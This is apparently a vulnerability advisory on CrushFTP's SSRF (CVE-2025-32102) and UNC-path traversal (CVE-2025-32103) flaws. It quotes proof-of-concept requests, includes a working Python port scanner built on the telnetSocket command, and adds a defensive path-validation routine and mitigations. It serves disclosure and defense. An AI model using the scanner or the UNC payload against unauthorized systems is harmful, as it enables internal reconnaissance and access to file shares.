Vulnerabilities in CrushFTP Could Allow Internal Scanning and SMB File Access

CrushFTP versions 9.x, 10.x up to and including 10.8.4, and 11.x up to and including 11.3.1 are affected by two vulnerabilities: CVE-2025-32102 (Server-Side Request Forgery) and CVE-2025-32103 (Directory Traversal). The SSRF flaw stems from missing validation of the host and port supplied to the telnetSocket command, which lets an authenticated user turn the server into a port scanner for networks it can reach. The Directory Traversal flaw lets the same kind of user point the getAdminXMLListing command at a UNC path and enumerate an SMB share instead of a local directory. Proof-of-concept (PoC) requests for both vulnerabilities are publicly available. Updating to a release later than 10.8.4 (10.x) or 11.3.1 (11.x), or off the 9.x branch entirely, is strongly recommended.

Technical Description

CrushFTP, a widely used file transfer server, is under heightened scrutiny after two security flaws were disclosed. The vulnerabilities, tracked as CVE-2025-32102 and CVE-2025-32103, expose the server to Server-Side Request Forgery (SSRF) and Directory Traversal attacks, respectively. Both are reached through the same /WebInterface/function/ endpoint that the web administration interface uses for its own operations.

SSRF Vulnerability (CVE-2025-32102)

CrushFTP's /WebInterface/function/ endpoint includes a telnet-based connectivity testing feature, exposing the telnetSocket command with caller-supplied host and port parameters. Because neither value is restricted, a requester can make the server open a TCP connection to any host and port it chooses, on the internal network or the internet. The application's responses, such as "Connected" or "Connection refused", reveal the port state, which turns the feature into an internal network reconnaissance and port-scanning primitive. This is a Server-Side Request Forgery (SSRF) weakness, classified under CWE-918.

By submitting crafted POST requests with altered host and port parameters, attackers can determine whether specific ports are open or closed. For example, a request to 127.0.0.1:8080 may generate a "Connected" response, whereas 127.0.0.1:8888 might return "Connection refused." Because every probe originates from the CrushFTP host's own address, the scan bypasses perimeter filtering and appears in network telemetry as ordinary traffic from a trusted server. This can expose internal services that assist in further exploitation, especially in cloud environments where sensitive endpoints, such as instance metadata APIs or administrative interfaces, are reachable only from inside the network.

The proof-of-concept is a POST request to the /WebInterface/function/ endpoint with command=telnetSocket and inputs such as host=127.0.0.1 and port=8080; the server's response indicates connection success or failure. Because the result is wrapped in XML tags, iterating over a port range and parsing the replies is easy to automate. The request must be sent within a valid CrushFTP session (a session cookie obtained by logging in), so the realistic precondition is an authenticated user, or stolen session cookies, combined with a web interface that is reachable from an untrusted network.
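The following script is an added example, not part of the advisory or the published PoC, and is intended for verifying your own instance after authorization. It builds the telnetSocket probe described above and classifies the XML reply into open/closed/unknown. The parameter names (command, host, port), the CrushAuth session cookie, the c2f anti-CSRF token derived from that cookie, and the exact XML wrapper of the reply are assumptions based on CrushFTP's general WebInterface conventions and the advisory's wording; the sample replies are constructed. The network send is injected as a callable so the logic runs offline against the constructed replies; swap in live_send to probe a real server.

```python
# Added example (not from the advisory or CrushFTP): build the telnetSocket
# probe and classify the XML reply. Parameter names, cookie/token handling and
# the reply format are assumptions; confirm against your own instance.
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

FUNCTION_PATH = "/WebInterface/function/"


def build_probe(base_url: str, host: str, port: int, crushauth: str) -> urllib.request.Request:
    """Return a prepared, unsent POST asking the server to connect to host:port."""
    body = urllib.parse.urlencode({
        "command": "telnetSocket",
        "host": host,
        "port": str(port),
        # Assumption: c2f is CrushFTP's CSRF token, the last four characters of CrushAuth.
        "c2f": crushauth[-4:],
    }).encode()
    return urllib.request.Request(
        base_url.rstrip("/") + FUNCTION_PATH,
        data=body,
        method="POST",
        headers={
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": f"CrushAuth={crushauth}",
        },
    )


def classify_reply(xml_text: str) -> str:
    """Map the XML-wrapped telnet result to 'open', 'closed' or 'unknown'."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return "unknown"
    text = " ".join(t.strip() for t in root.itertext() if t.strip()).lower()
    # Check the failure wording first: "connection refused" must not match "connected".
    if "connection refused" in text or "timed out" in text:
        return "closed"
    if "connected" in text:
        return "open"
    return "unknown"


def scan(base_url: str, target_host: str, ports, crushauth: str, send) -> dict:
    """send(request) -> reply body as str. Injected so the scan can run offline."""
    return {p: classify_reply(send(build_probe(base_url, target_host, p, crushauth)))
            for p in ports}


def live_send(req: urllib.request.Request) -> str:
    """Real transport for authorized testing against your own server."""
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


# Constructed sample replies shaped after the advisory's "Connected" / "Connection refused" wording.
SAMPLE_REPLIES = {
    8080: '<?xml version="1.0"?><result><response>Connected to 127.0.0.1:8080</response></result>',
    8888: '<?xml version="1.0"?><result><response>Connection refused</response></result>',
}


def fake_send(req: urllib.request.Request) -> str:
    """Offline stand-in for live_send that answers from SAMPLE_REPLIES."""
    port = int(urllib.parse.parse_qs(req.data.decode())["port"][0])
    return SAMPLE_REPLIES.get(port, "<result><response>unknown host</response></result>")


if __name__ == "__main__":
    # Hypothetical host and session cookie; replace with your own when using live_send.
    result = scan("https://crush.example.internal", "127.0.0.1", [8080, 8888, 9000],
                  "0123456789abcdef", fake_send)
    print(result)
```

Even the offline run shows the detection signal a defender should look for: a single session issuing many telnetSocket requests whose host parameter is a loopback or RFC 1918 address and whose port steps through a range.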

Directory Traversal (CVE-2025-32103)

The directory traversal flaw stems from how CrushFTP processes file path inputs via the /WebInterface/function/ endpoint. Specifically, the getAdminXMLListing command, intended to display directory contents, does not reject UNC path inputs. Instead of supplying a standard local path (e.g., C:/data), an attacker can insert a UNC path such as \\server\resource, and the server lists the remote SMB share on the attacker's behalf, using whatever network access the CrushFTP process itself has.

The root cause is the application's failure to validate or restrict external file system references, so listings are no longer confined to the directories the local machine is meant to expose. Crucially, this path bypasses the SecurityManager, CrushFTP's primary access control mechanism, so the policies it enforces for ordinary file operations do not prevent the traversal.

The proof-of-concept sends a POST request with the parameter path=\\\\vboxsrv\\demo to the getAdminXMLListing function (the doubled backslashes are escaping in the published request; after decoding the server sees the UNC path \\vboxsrv\demo). The server responds with an XML directory listing of the SMB share, including metadata such as name, href_path, root_dir, and privs, confirming successful enumeration of the remote file system.
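The check below is an added example of the validation the traversal flaw is missing; it is not CrushFTP's code, and the listing root and sample inputs are constructed for illustration. It accepts only a relative path, rejects anything with a Windows anchor (UNC paths in either slash style, drive letters, the \\?\ device-path form, or a bare leading separator) and any parent-directory component, and then joins the remainder onto a fixed root. It uses Windows path semantics regardless of the host it runs on, because UNC paths only resolve to SMB shares under those rules.

```python
# Added example (not CrushFTP's code): confine a user-supplied listing path to a
# fixed root and refuse UNC, drive-absolute and traversal inputs. Root and
# sample inputs are constructed for illustration.
from pathlib import PureWindowsPath


class PathRejected(ValueError):
    """Raised when a listing path must not be passed to the file system."""


def normalise_listing_path(user_path: str, root: str) -> str:
    """
    Return root joined with user_path, or raise PathRejected.

    Rejected: empty or NUL-containing input; anything with a Windows anchor
    (\\server\share, //server/share, C:\..., C:relative, \\?\..., \leading);
    any '..' component. Forward slashes are folded into backslashes first
    because Windows treats //server/share as UNC as well.
    """
    if not user_path or "\x00" in user_path:
        raise PathRejected("empty or NUL-containing path")
    candidate = PureWindowsPath(user_path.replace("/", "\\"))
    if candidate.anchor:
        # .anchor covers the UNC drive ('\\\\server\\share\\'), a drive letter
        # ('C:' or 'C:\\'), the \\?\ prefix, and a bare root '\\'.
        raise PathRejected(f"absolute, UNC or device path not allowed: {user_path!r}")
    parts = candidate.parts
    if any(p == ".." for p in parts):
        raise PathRejected(f"parent-directory traversal not allowed: {user_path!r}")
    parts = [p for p in parts if p != "."]
    return str(PureWindowsPath(root).joinpath(*parts))


def is_safe_listing_path(user_path: str, root: str) -> bool:
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        normalise_listing_path(user_path, root)
        return True
    except PathRejected:
        return False


if __name__ == "__main__":
    ROOT = "D:\\crush\\data"  # constructed listing root
    samples = [
        "reports/q1",                 # ordinary relative path: accepted
        "\\\\vboxsrv\\demo",          # the advisory's UNC PoC after form decoding
        "//vboxsrv/demo",             # forward-slash UNC spelling
        "\\\\?\\UNC\\vboxsrv\\demo",  # long device-path form of the same share
        "C:\\Windows",                # drive-absolute
        "\\etc",                      # bare root
        "reports\\..\\..\\secrets",   # classic traversal
    ]
    for s in samples:
        try:
            print(f"accept {s!r} -> {normalise_listing_path(s, ROOT)}")
        except PathRejected as e:
            print(f"reject {s!r}: {e}")
```

The important design point is that the decision is made on the anchor and the components, not on a denylist of strings: an attacker cannot reach a share by re-encoding the separators, and a later decoding layer cannot turn an accepted value into an absolute path because the accepted value never had an anchor to begin with.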

Conclusion

These vulnerabilities highlight ongoing weaknesses in input validation within web-facing administrative components. The SSRF issue turns a telnet-based connectivity check into a way to reach across network boundaries from the server's own address, while the directory traversal flaw reaches internal or remote file systems through UNC path injection. Both exploits are single HTTP requests that require minimal technical expertise, emphasizing the need for strict input validation and robust access controls in administrative web interfaces.

Impact

Both vulnerabilities affect CrushFTP versions 9.x, all 10.x up to 10.8.4, and 11.x through 11.3.1. These versions are widely used in enterprise environments, which raises the risk profile. The affected endpoint is part of the same web interface that administrators use, so wherever that interface is reachable from the internet or from poorly segmented networks, the precondition of a valid session is the only barrier. Exploitation of CVE-2025-32102 enables internal port scanning and discovery of internal services, while CVE-2025-32103 lets an attacker bypass local access controls and enumerate remote SMB shares reachable by the server. Together, these flaws introduce serious risks, including information disclosure, lateral movement, and the staging of follow-on attacks.

IOC and Context Details

Topics                   Details
Tactic Name              NA
Technique Name           NA
Sub Technique Name       NA
Attack Type              Vulnerability
Targeted Applications    CrushFTP
Region Impacted          Global
Industry Impacted        All
IOCs                     NA
CVE                      CVE-2025-32102, CVE-2025-32103

Recommended Actions

  1. Promptly update CrushFTP to a patched release: later than 10.8.4 on the 10.x branch or later than 11.3.1 on the 11.x branch; 9.x installations should move to a supported patched branch.
  2. Restrict access to the web interface (including /WebInterface/function/) to trusted networks using firewalls or a reverse proxy. Note that the same endpoint serves the legitimate web UI, so restrict by source network and by account rather than blocking the path outright.
  3. Validate and constrain all user-supplied paths before they reach the file system: reject UNC paths and absolute paths, and confine listings to a fixed root.
  4. Disable unnecessary features, such as telnet-based diagnostic tools, in production environments where the product allows it, and limit administrative accounts to the people who need them.
  5. Conduct regular audits of access control settings, review where SMB paths are used in workflows, and monitor for bursts of telnetSocket requests or getAdminXMLListing requests carrying UNC paths.
